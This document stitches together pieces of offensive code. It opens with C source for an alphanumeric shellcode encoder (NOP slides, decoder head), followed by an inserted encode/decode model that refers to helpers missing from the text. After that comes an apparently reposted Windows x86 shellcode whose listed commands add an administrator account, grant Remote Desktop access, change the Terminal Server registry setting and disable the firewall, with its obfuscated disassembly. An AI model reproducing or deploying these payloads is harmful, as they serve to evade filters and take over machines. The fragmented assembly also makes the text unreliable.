UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr, *substr, *suffix_substr, *output_str;
    UINT prefix_substr_len, suffix_substr_len;
    if(slide > substr_offset)
    {
        printf("you can't slide it that far back!\n");
        return 0;
    }
    output_str = malloc(str_len);
    memset(output_str, 0 , str_len);
    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);
    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);
    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
    strncpy(output_str, prefix_substr, prefix_substr_len-slide);
    strncpy(output_str+prefix_substr_len-slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide);
    strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len);
    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr, *substr, *suffix_substr, *output_str;
    UINT prefix_substr_len, suffix_substr_len;
    if(slide > str_len-substr_len-substr_offset)
    {
        printf("you can't slide it that far forward!\n");
        return 0;
    }
    output_str = malloc(str_len);
    memset(output_str, 0 , str_len);
    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);
    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);
    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
    strncpy(output_str, prefix_substr, prefix_substr_len);
    strncpy(output_str+prefix_substr_len, suffix_substr, slide);
    strncpy(output_str+prefix_substr_len+slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide);
    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *get_nop_slide(UINT size, UINT slide)
{
    //simple alnum nop slide generator
    UINT i, x, append_dec_eax = 0;
    UCHAR alnum_nop[][3] = {
        "AI", //inc ecx;dec ecx // (alnum_nop[0])
        "BJ", //inc edx;dec edx // (alnum_nop[1])
        "CK", //inc ebx;dec ebx // (alnum_nop[2])
        "EM", //inc ebp;dec ebp // (alnum_nop[3])
        "FN", //inc esi;dec esi // (alnum_nop[4])
        "GO", //inc edi;dec edi // (alnum_nop[5])                                  [we don't care about eax value before the imul]
        "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2   [instruction as it overwrites eax with result ]
        "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2   [and we don't care about edi value at all.    ]
        "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state]  //we can freely inc/dec esp for now
        "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state]  //but we need to take it into account
        "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state]  //once we start pushing/popping to/from
        "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state]  //the stack.
        //TODO:
        // push eax   push eax   push eax   push ecx   push edx
        // pop eax    push ecx   push ecx   dec esp    pop edx
        // push ecx   pop ecx    push edx   inc esp    push ecx
        // pop ecx    pop eax    inc esp    pop ecx    pop ecx
        // push edx   push edx   dec esp    push eax   push eax
        // pop edx    pop edx    pop edx    inc esp    pop eax
        //            pop ecx    dec esp    .
        //            pop eax    pop eax    .
        //            push edx              .
        //            pop edx               etc...
    };
    UCHAR *nop_slide;
    nop_slide = malloc(size);
    memset(nop_slide, 0, size);
    if(size%2)
    {
        append_dec_eax = 1;
        size--;
    }
    for(i=0; i<(size/2); i++)
    {
        do
            x = rand()%(sizeof(alnum_nop)/3);
        while ((slide==2)&&(x==6||x==7));
        strcat(nop_slide, alnum_nop[x]);
    }
    if(append_dec_eax)
    {
        strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide
    }
    return nop_slide;
}

UCHAR get_random_alnum_push_dword_opcode()
{
    UCHAR alnum_push_dword_opcode[] = {
        'P', //0x50 push eax
        'Q', //0x51 push ecx
        'R', //0x52 push edx
        'S', //0x53 push ebx
        'T', //0x54 push esp
        'U', //0x55 push ebp
        'V', //0x56 push esi
        'W'  //0x57 push edi
    };
    return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)];
}

UCHAR get_random_alnum_value()
{
    char alnum_values[] = ALNUM_CHARSET;
    return alnum_values[rand()%strlen(alnum_values)];
}

UCHAR get_push_register_instruction(UCHAR *reg)
{
    if (!strcmp(reg, "eax"))
        return 'P'; //0x50 push eax
    else if (!strcmp(reg, "ecx"))
        return 'Q'; //0x51 push ecx
    else if (!strcmp(reg, "edx"))
        return 'R'; //0x52 push edx
    else if (!strcmp(reg, "ebx"))
        return 'S'; //0x53 push ebx
    else if (!strcmp(reg, "esp"))
        return 'T'; //0x54 push esp
    else if (!strcmp(reg, "ebp"))
        return 'U'; //0x55 push ebp
    else if (!strcmp(reg, "esi"))
        return 'V'; //0x56 push esi
    else if (!strcmp(reg, "edi"))
        return 'W'; //0x57 push edi
    else
        return 0;
}

UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1)
{
    UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10};
    UCHAR instructions[11][3];
    UCHAR instruction_comments[11][28];
    UINT i,c, state;
    UCHAR *output;
    UCHAR *random_states;
    UCHAR *p_state[5];
    output = malloc(17);
    memset(output, 0, 17);
    memset(instructions, 0, 11*3);
    memset(instruction_comments, 0, 11*28);

    instructions[0][0] = '\x6a';  //j
    instructions[0][1] = xor_al1;
    instructions[1][0] = '\x58';  //X
    instructions[2][0] = '\x34';  //4
    instructions[2][1] = xor_al1;
    instructions[3][0] = '\x48';  //H
    instructions[4][0] = '\x34';  //4
    instructions[4][1] = jne_xor1;
    instructions[5][0] = '\x30';  //0
    instructions[5][1] = '\x42';  //B
    instructions[5][2] = size_decoder-1;
    instructions[6][0] = '\x52';  //R
    instructions[7][0] = '\x52';  //R
    instructions[8][0] = '\x59';  //Y
    instructions[9][0] = '\x47';  //G
    instructions[10][0] = '\x43'; //C

    strcat(instruction_comments[0], "push XOR_AL1");
    strcat(instruction_comments[1], "pop eax");
    strcat(instruction_comments[2], "xor al, XOR_AL1");
    strcat(instruction_comments[3], "dec eax");
    strcat(instruction_comments[4], "xor al, JNE_XOR1");
    strcat(instruction_comments[5], "xor byte ptr [edx+size], al");
    strcat(instruction_comments[6], "push edx");
    strcat(instruction_comments[7], "push edx");
    strcat(instruction_comments[8], "pop ecx");
    strcat(instruction_comments[9], "inc edi");
    strcat(instruction_comments[10], "inc ebx");

    do
    {
        memset(p_state, 0, sizeof(UCHAR*)*5);
        random_states = shuffle(states, 11);

        //.*0.*1.*2.*3.*4.*5
        p_state[0] = memchr(random_states, 0, 11);
        if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states));

        //.*[67].*8
        if(p_state[1])
        {
            p_state[2] = memchr(random_states, 6, 11);
            p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            if(!p_state[3])
            {
                p_state[2] = memchr(random_states, 7, 11);
                p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            }
            if(p_state[3])
            {
                //.*1.*[67].*[67]
                if(p_state[2] && p_state[1] < p_state[2])
                    p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states));

                //.*0.*[67].*8.*1
                if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states));
                if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states));

                //.*[67].*8.*0.*1.*[67]
                if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states));
            }
        }
    } while (!p_state[4]);

    for (c=state=0; state<sizeof(states); state++)
    {
        i=0;
        while (instructions[random_states[state]][i] && i < 3)
        {
            output[c] = instructions[random_states[state]][i];
            i++;
            c++;
        }
    }

    printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n",
           random_states[0], random_states[1], random_states[2], random_states[3],
           random_states[4], random_states[5], random_states[6], random_states[7],
           random_states[8], random_states[9], random_states[10]);
    printf("%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n" \
           "%s\n======================\n",
           instruction_comments[random_states[0]],
           instruction_comments[random_states[1]],
           instruction_comments[random_states[2]],
           instruction_comments[random_states[3]],
           instruction_comments[random_states[4]],
           instruction_comments[random_states[5]],
           instruction_comments[random_states[6]],
           instruction_comments[random_states[7]],
           instruction_comments[random_states[8]],
           instruction_comments[random_states[9]],
           instruction_comments[random_states[10]]);
    return output;
}
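The encoding loop at RE_RUN and the scan_str_known_pattern helpers above define the scheme but leave the arithmetic spread over a linked-list search, rand() and goto. The following is an added example written for this page, not code from the post: a stand-alone C model of the same encoding, original_byte == (first_byte * third_byte) ^ second_byte mod 256, where third_byte doubles as the next pair's first_byte and the trailing key becomes the first byte of a 4-byte terminator. Assumptions: the charset is 0-9A-Za-z (the post's ALNUM_CHARSET macro is not in this excerpt), deterministic backtracking replaces the post's rand() plus restart, and the decode model reads the terminator from the buffer tail whereas the real decoder stub carries it in its own bytes. The sample input is constructed, not taken from the post.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumed charset: the post's ALNUM_CHARSET macro is not in this excerpt. */
static const char ALNUM[] =
    "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
#define TERM_LEN 4

static int is_alnum_byte(uint8_t c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}

/* Place byte i, whose first_byte x1 is already fixed by the previous pair.
   Tries every alnum key; x2 = (x1*key mod 256) ^ byte must itself be alnum.
   Returns 0 when no key works so the caller can pick another key (this
   backtracking replaces the post's goto RE_RUN). */
static int encode_from(const uint8_t *in, size_t n, size_t i, uint8_t x1, uint8_t *out)
{
    if (i == n) {                       /* all bytes placed: x1 is the trailing key */
        out[2 * n] = x1;
        return 1;
    }
    for (size_t k = 0; ALNUM[k]; k++) {
        uint8_t key = (uint8_t)ALNUM[k];
        uint8_t x2  = (uint8_t)(((x1 * key) & 0xff) ^ in[i]);
        if (!is_alnum_byte(x2))
            continue;
        out[2 * i]     = x1;
        out[2 * i + 1] = x2;
        if (encode_from(in, n, i + 1, key, out))   /* key is the next pair's first_byte */
            return 1;
    }
    return 0;
}

/* Encode n bytes into 2*n + TERM_LEN alnum bytes; returns that length or -1. */
static int alnum_encode(const uint8_t *in, size_t n, uint8_t *out, size_t out_cap)
{
    size_t s;
    if (out_cap < 2 * n + TERM_LEN)
        return -1;
    for (s = 0; ALNUM[s]; s++)          /* restart over initial first_byte values */
        if (encode_from(in, n, 0, (uint8_t)ALNUM[s], out))
            break;
    if (!ALNUM[s])
        return -1;
    /* Terminator = trailing key + 3 alnum bytes, chosen so the 4-byte marker does
       not also occur inside the encoded data (the post's terminating_key_exist()
       condition, satisfied constructively instead of by re-running). */
    for (size_t a = 0; ALNUM[a]; a++)
        for (size_t b = 0; ALNUM[b]; b++)
            for (size_t c = 0; ALNUM[c]; c++) {
                int collides = 0;
                out[2 * n + 1] = (uint8_t)ALNUM[a];
                out[2 * n + 2] = (uint8_t)ALNUM[b];
                out[2 * n + 3] = (uint8_t)ALNUM[c];
                for (size_t i = 0; i < 2 * n && !collides; i++)
                    collides = memcmp(out + i, out + 2 * n, TERM_LEN) == 0;
                if (!collides)
                    return (int)(2 * n + TERM_LEN);
            }
    return -1;
}

/* Model of the arithmetic the decoder stub performs: walk the pairs until the
   4-byte terminator, emitting (buf[0]*buf[2]) ^ buf[1] for each pair. */
static int alnum_decode(const uint8_t *enc, size_t len, uint8_t *out, size_t out_cap)
{
    size_t i = 0, n = 0;
    if (len < TERM_LEN)
        return -1;
    const uint8_t *term = enc + len - TERM_LEN;   /* the real stub carries this itself */
    while (i + TERM_LEN <= len && memcmp(enc + i, term, TERM_LEN) != 0) {
        if (n >= out_cap || i + 2 >= len)
            return -1;
        out[n++] = (uint8_t)(((enc[i] * enc[i + 2]) & 0xff) ^ enc[i + 1]);
        i += 2;
    }
    return (i + TERM_LEN == len) ? (int)n : -1;
}

/* Constructed sample (not from the post): bytes that cannot appear verbatim in an
   alphanumeric buffer, including 0x00 and 0xff. */
static const uint8_t SAMPLE[] = { 0x31, 0xc0, 0x50, 0x68, 0x00, 0xff, 0x90, 0xcc };

/* Round trip: returns the encoded length when every output byte is alnum and
   decoding recovers SAMPLE exactly, otherwise -1. */
int demo_roundtrip(void)
{
    uint8_t enc[2 * sizeof SAMPLE + TERM_LEN], dec[sizeof SAMPLE];
    int elen = alnum_encode(SAMPLE, sizeof SAMPLE, enc, sizeof enc);
    if (elen < 0)
        return -1;
    for (int i = 0; i < elen; i++)
        if (!is_alnum_byte(enc[i]))
            return -1;
    if (alnum_decode(enc, (size_t)elen, dec, sizeof dec) != (int)sizeof SAMPLE)
        return -1;
    return memcmp(dec, SAMPLE, sizeof SAMPLE) == 0 ? elen : -1;
}

int main(void)
{
    uint8_t enc[2 * sizeof SAMPLE + TERM_LEN + 1];
    int elen = alnum_encode(SAMPLE, sizeof SAMPLE, enc, sizeof enc - 1);
    if (elen < 0) { puts("encode failed"); return 1; }
    enc[elen] = 0;
    printf("encoded (%d bytes): %s\nround trip: %s\n", elen, (const char *)enc,
           demo_roundtrip() > 0 ? "ok" : "FAILED");
    return 0;
}
```

Two properties worth checking on any output of the post's tool follow directly from this model: the encoded body is exactly 2*n bytes plus the 4-byte terminator, and the terminator must not occur at any earlier offset, otherwise the decoder stops early and executes a truncated payload. Because every alnum first_byte has at least one alnum (key, x2) pair for every input byte, the search above never fails on the first position; the backtracking only matters at later positions where the previous key has already fixed first_byte.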
  13.
#Author: Ali Razmjoo
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start terminal service]

Obfuscated Shellcode Windows x86 [1218 Bytes].c

/*
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start terminal service]
#length: 1218 bytes
#Date: 13 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x86 ultimate

WinExec => 0x7666e695
ExitProcess => 0x76632acf
====================================
Execute :
net user ALI ALI /add
net localgroup Administrators ALI /add
NET LOCALGROUP "Remote Desktop Users" ALI /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
netsh firewall set opmode disable
sc config termservice start= auto
====================================
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami

C:\Users\Ali\Desktop>objdump -D shellcode.o

shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:	31 c0             	xor    %eax,%eax
   2:	50                	push   %eax
   3:	b8 41 41 41 64    	mov    $0x64414141,%eax
   8:	c1 e8 08          	shr    $0x8,%eax
   b:	c1 e8 08          	shr    $0x8,%eax
   e:	c1 e8 08          	shr    $0x8,%eax
  11:	50                	push   %eax
  12:	b9 6d 76 53 52    	mov    $0x5253766d,%ecx
  17:	ba 4d 59 32 36    	mov    $0x3632594d,%edx
  1c:	31 d1             	xor    %edx,%ecx
  1e:	51                	push   %ecx
  1f:	b9 6e 72 61 71    	mov    $0x7161726e,%ecx
  24:	ba 4e 33 2d 38    	mov    $0x382d334e,%edx
  29:	31 d1             	xor    %edx,%ecx
  2b:	51                	push   %ecx
  2c:	b9 6c 75 78 78    	mov    $0x7878756c,%ecx
  31:	ba 4c 34 34 31    	mov    $0x3134344c,%edx
  36:	31 d1             	xor    %edx,%ecx
  38:	51                	push   %ecx
  39:	b9 46 47 57 46    	mov    $0x46574746,%ecx
  3e:	ba 33 34 32 34    	mov    $0x34323433,%edx
  43:	31 d1             	xor    %edx,%ecx
  45:	51                	push   %ecx
  46:	b9 56 50 47 64    	mov    $0x64475056,%ecx
  4b:	ba 38 35 33 44    	mov    $0x44333538,%edx
  50:	31 d1             	xor    %edx,%ecx
  52:	51                	push   %ecx
  53:	89 e0             	mov    %esp,%eax
  55:	bb 41 41 41 01    	mov    $0x1414141,%ebx
  5a:	c1 eb 08          	shr    $0x8,%ebx
  5d:	c1 eb 08          	shr    $0x8,%ebx
  60:	c1 eb 08          	shr    $0x8,%ebx
  63:	53                	push   %ebx
  64:	50                	push   %eax
  65:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
  6a:	ba 33 52 64 59    	mov    $0x59645233,%edx
  6f:	31 d3             	xor    %edx,%ebx
  71:	ff d3             	call   *%ebx
  73:	31 c0             	xor    %eax,%eax
  75:	50                	push   %eax
  76:	68 41 41 64 64    	push   $0x64644141
  7b:	58                	pop    %eax
  7c:	c1 e8 08          	shr    $0x8,%eax
  7f:	c1 e8 08          	shr    $0x8,%eax
  82:	50                	push   %eax
  83:	b9 01 41 60 32    	mov    $0x32604101,%ecx
  88:	ba 48 61 4f 53    	mov    $0x534f6148,%edx
  8d:	31 d1             	xor    %edx,%ecx
  8f:	51                	push   %ecx
  90:	b9 28 47 0d 2f    	mov    $0x2f0d4728,%ecx
  95:	ba 5b 67 4c 63    	mov    $0x634c675b,%edx
  9a:	31 d1             	xor    %edx,%ecx
  9c:	51                	push   %ecx
  9d:	b9 03 24 36 21    	mov    $0x21362403,%ecx
  a2:	ba 62 50 59 53    	mov    $0x53595062,%edx
  a7:	31 d1             	xor    %edx,%ecx
  a9:	51                	push   %ecx
  aa:	b9 34 41 15 18    	mov    $0x18154134,%ecx
  af:	ba 5d 32 61 6a    	mov    $0x6a61325d,%edx
  b4:	31 d1             	xor    %edx,%ecx
  b6:	51                	push   %ecx
  b7:	b9 0c 05 1b 25    	mov    $0x251b050c,%ecx
  bc:	ba 68 68 72 4b    	mov    $0x4b726868,%edx
  c1:	31 d1             	xor    %edx,%ecx
  c3:	51                	push   %ecx
  c4:	b9 2f 27 7b 13    	mov    $0x137b272f,%ecx
  c9:	ba 5a 57 5b 52    	mov    $0x525b575a,%edx
  ce:	31 d1             	xor    %edx,%ecx
  d0:	51                	push   %ecx
  d1:	b9 1c 2c 02 3e    	mov    $0x3e022c1c,%ecx
  d6:	ba 70 4b 70 51    	mov    $0x51704b70,%edx
  db:	31 d1             	xor    %edx,%ecx
  dd:	51                	push   %ecx
  de:	b9 3d 2a 32 4c    	mov    $0x4c322a3d,%ecx
  e3:	ba 51 45 51 2d    	mov    $0x2d514551,%edx
  e8:	31 d1             	xor    %edx,%ecx
  ea:	51                	push   %ecx
  eb:	b9 23 5c 1c 19    	mov    $0x191c5c23,%ecx
  f0:	ba 4d 39 68 39    	mov    $0x3968394d,%edx
  f5:	31 d1             	xor    %edx,%ecx
  f7:	51                	push   %ecx
  f8:	89 e0             	mov    %esp,%eax
  fa:	bb 41 41 41 01    	mov    $0x1414141,%ebx
  ff:	c1 eb 08          	shr    $0x8,%ebx
 102:	c1 eb 08          	shr    $0x8,%ebx
 105:	c1 eb 08          	shr    $0x8,%ebx
 108:	53                	push   %ebx
 109:	50                	push   %eax
 10a:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
 10f:	ba 33 52 64 59    	mov    $0x59645233,%edx
 114:	31 d3             	xor    %edx,%ebx
 116:	ff d3             	call   *%ebx
 118:	31 c0             	xor    %eax,%eax
 11a:	50                	push   %eax
 11b:	68 41 41 64 64    	push   $0x64644141
 120:	58                	pop    %eax
 121:	c1 e8 08          	shr    $0x8,%eax
 124:	c1 e8 08          	shr    $0x8,%eax
 127:	50                	push   %eax
 128:	b9 02 63 6b 35    	mov    $0x356b6302,%ecx
 12d:	ba 4b 43 44 54    	mov    $0x5444434b,%edx
 132:	31 d1             	xor    %edx,%ecx
 134:	51                	push   %ecx
 135:	b9 61 55 6c 3d    	mov    $0x3d6c5561,%ecx
 13a:	ba 43 75 2d 71    	mov    $0x712d7543,%edx
 13f:	31 d1             	xor    %edx,%ecx
 141:	51                	push   %ecx
 142:	b9 27 3f 3b 1a    	mov    $0x1a3b3f27,%ecx
 147:	ba 54 5a 49 69    	mov    $0x69495a54,%edx
 14c:	31 d1             	xor    %edx,%ecx
 14e:	51                	push   %ecx
 14f:	b9 25 34 12 67    	mov    $0x67123425,%ecx
 154:	ba 4a 44 32 32    	mov    $0x3232444a,%edx
 159:	31 d1             	xor    %edx,%ecx
 15b:	51                	push   %ecx
 15c:	b9 0b 02 1f 19    	mov    $0x191f020b,%ecx
 161:	ba 6e 71 74 6d    	mov    $0x6d74716e,%edx
 166:	31 d1             	xor    %edx,%ecx
 168:	51                	push   %ecx
 169:	b9 39 3f 7b 15    	mov    $0x157b3f39,%ecx
 16e:	ba 4d 5a 5b 51    	mov    $0x515b5a4d,%edx
 173:	31 d1             	xor    %edx,%ecx
 175:	51                	push   %ecx
 176:	b9 35 15 03 2a    	mov    $0x2a031535,%ecx
 17b:	ba 67 70 6e 45    	mov    $0x456e7067,%edx
 180:	31 d1             	xor    %edx,%ecx
 182:	51                	push   %ecx
 183:	b9 3a 17 75 46    	mov    $0x4675173a,%ecx
 188:	ba 6f 47 55 64    	mov    $0x6455476f,%edx
 18d:	31 d1             	xor    %edx,%ecx
 18f:	51                	push   %ecx
 190:	b9 26 35 0b 1e    	mov    $0x1e0b3526,%ecx
 195:	ba 6a 72 59 51    	mov    $0x5159726a,%edx
 19a:	31 d1             	xor    %edx,%ecx
 19c:	51                	push   %ecx
 19d:	b9 2a 2a 06 2a    	mov    $0x2a062a2a,%ecx
 1a2:	ba 66 65 45 6b    	mov    $0x6b456566,%edx
 1a7:	31 d1             	xor    %edx,%ecx
 1a9:	51                	push   %ecx
 1aa:	b9 1d 20 35 5a    	mov    $0x5a35201d,%ecx
 1af:	ba 53 65 61 7a    	mov    $0x7a616553,%edx
 1b4:	31 d1             	xor    %edx,%ecx
 1b6:	51                	push   %ecx
 1b7:	89 e0             	mov    %esp,%eax
 1b9:	bb 41 41 41 01    	mov    $0x1414141,%ebx
 1be:	c1 eb 08          	shr    $0x8,%ebx
 1c1:	c1 eb 08          	shr    $0x8,%ebx
 1c4:	c1 eb 08          	shr    $0x8,%ebx
 1c7:	53                	push   %ebx
 1c8:	50                	push   %eax
 1c9:	bb a6 b4 02 2f    	mov    $0x2f02b4a6,%ebx
 1ce:	ba 33 52 64 59    	mov    $0x59645233,%edx
 1d3:	31 d3             	xor    %edx,%ebx
 1d5:	ff d3             	call   *%ebx
 1d7:	31 c0             	xor    %eax,%eax
 1d9:	50                	push   %eax
 1da:	b9 09 4c 7c 5e    	mov    $0x5e7c4c09,%ecx
 1df:	ba 38 6c 53 38    	mov    $0x38536c38,%edx
 1e4:	31 d1             	xor    %edx,%ecx
 1e6:	51                	push   %ecx
 1e7:	b9 42 4d 39 14    	mov    $0x14394d42,%ecx
 1ec:	ba 62 62 5d 34    	mov    $0x345d6262,%edx
 1f1:	31 d1             	xor    %edx,%ecx
 1f3:	51                	push   %ecx
 1f4:	b9 7a 24 26 75    	mov    $0x7526247a,%ecx
 1f9:	ba 2d 6b 74 31    	mov    $0x31746b2d,%edx
 1fe:	31 d1             	xor    %edx,%ecx
 200:	51                	push   %ecx
 201:	b9 1d 30 15 28    	mov    $0x2815301d,%ecx
 206:	ba 58 77 4a 6c    	mov    $0x6c4a7758,%edx
 20b:	31 d1             	xor    %edx,%ecx
 20d:	51                	push   %ecx
 20e:	b9 7c 2f 57 16    	mov    $0x16572f7c,%ecx
 213:	ba 53 5b 77 44    	mov    $0x44775b53,%edx
 218:	31 d1             	xor    %edx,%ecx
 21a:	51                	push   %ecx
 21b:	b9 42 25 2a 66    	mov    $0x662a2542,%ecx
 220:	ba 2d 4b 59 46    	mov    $0x46594b2d,%edx
 225:	31 d1             	xor    %edx,%ecx
 227:	51                	push   %ecx
 228:	b9 28 2f 0c 5a    	mov    $0x5a0c2f28,%ecx
 22d:	ba 4d 4c 78 33    	mov    $0x33784c4d,%edx
 232:	31 d1             	xor    %edx,%ecx
 234:	51                	push   %ecx
 235:	b9 20 2b 26 26    	mov    $0x26262b20,%ecx
 23a:	ba 63 44 48 48    	mov    $0x48484463,%edx
 23f:	31 d1             	xor    %edx,%ecx
 241:	51                	push   %ecx
 242:	b9 08 2b 23 67    	mov    $0x67232b08,%ecx
 247:	ba 66 52 77 34    	mov    $0x34775266,%edx
 24c:	31 d1             	xor    %edx,%ecx
 24e:	51                	push   %ecx
 24f:	b9 49 1c 2e 48    	mov    $0x482e1c49,%ecx
 254:	ba 69 7a 6a 2d    	mov    $0x2d6a7a69,%edx
 259:	31 d1             	xor    %edx,%ecx
 25b:	51                	push   %ecx
 25c:	b9 67 67 1d 37    	mov    $0x371d6767,%ecx
 261:	ba 45 47 32 41    	mov    $0x41324745,%edx
 266:	31 d1             	xor    %edx,%ecx
 268:	51                	push   %ecx
 269:	b9 03 33 0d 3b    	mov    $0x3b0d3303,%ecx
 26e:	ba 71 45 68 49    	mov    $0x49684571,%edx
 273:	31 d1             	xor    %edx,%ecx
 275:	51                	push   %ecx
 276:	b9 39 6a 3c 2f    	mov    $0x2f3c6a39,%ecx
 27b:	ba 55 4a 6f 4a    	mov    $0x4a6f4a55,%edx
 280:	31 d1             	xor    %edx,%ecx
 282:	51                	push   %ecx
 283:	b9 37 44 1f 2e    	mov    $0x2e1f4437,%ecx
 288:	ba 5a 2d 71 4f    	mov    $0x4f712d5a,%edx
 28d:	31 d1             	xor    %edx,%ecx
 28f:	51                	push   %ecx
 290:	b9 34 23 23 3b    	mov    $0x3b232334,%ecx
 295:	ba 68 77 46 49    	mov    $0x49467768,%edx
 29a:	31 d1             	xor    %edx,%ecx
 29c:	51                	push   %ecx
 29d:	b9 07 3a 0a 14    	mov    $0x140a3a07,%ecx
 2a2:	ba 73 48 65 78    	mov    $0x78654873,%edx
 2a7:	31 d1             	xor    %edx,%ecx
 2a9:	51                	push   %ecx
 2aa:	b9 14 2e 58 53    	mov    $0x53582e14,%ecx
 2af:	ba 48 6d 37 3d    	mov    $0x3d376d48,%edx
 2b4:	31 d1             	xor    %edx,%ecx
 2b6:	51                	push   %ecx
 2b7:	b9 3e 3d 26 32    	mov    $0x32263d3e,%ecx
 2bc:	ba 52 6e 43 46    	mov    $0x46436e52,%edx
 2c1:	31 d1             	xor    %edx,%ecx
 2c3:	51                	push   %ecx
 2c4:	b9 33 3c 35 34    	mov    $0x34353c33,%ecx
 2c9:	ba 5d 48 47 5b    	mov    $0x5b47485d,%edx
 2ce:	31 d1             	xor    %edx,%ecx
 2d0:	51                	push   %ecx
 2d1:	b9 36 0e 07 2b    	mov    $0x2b070e36,%ecx
 2d6:	ba 58 7a 44 44    	mov    $0x44447a58,%edx
 2db:	31 d1             	xor    %edx,%ecx
 2dd:	51                	push   %ecx
 2de:	b9 3c 10 0a 37    	mov    $0x370a103c,%ecx
 2e3:	ba 49 62 78 52    	mov    $0x52786249,%edx
 2e8:	31 d1             	xor    %edx,%ecx
 2ea:	51                	push   %ecx
 2eb:	b9 24 7c 3b 36    	mov    $0x363b7c24,%ecx
 2f0:	ba 61 31 67 75    	mov    $0x75673161,%edx
 2f5:	31 d1             	xor    %edx,%ecx
 2f7:	51                	push   %ecx
 2f8:	b9 31 3d 3b 27    	mov    $0x273b3d31,%ecx
 2fd:	ba 62 64 68 73    	mov    $0x73686462,%edx
 302:	31 d1             	xor    %edx,%ecx
 304:	51                	push   %ecx
 305:	b9 7f 7d 3d 35    	mov    $0x353d7d7f,%ecx
 30a:	ba 36 33 78 69    	mov    $0x69783336,%edx
 30f:	31 d1             	xor    %edx,%ecx
 311:	51                	push   %ecx
 312:	b9 7c 13 0f 2f    	mov    $0x2f0f137c,%ecx
 317:	ba 31 52 4c 67    	mov    $0x674c5231,%edx
 31c:	31 d1             	xor    %edx,%ecx
 31e:	51                	push   %ecx
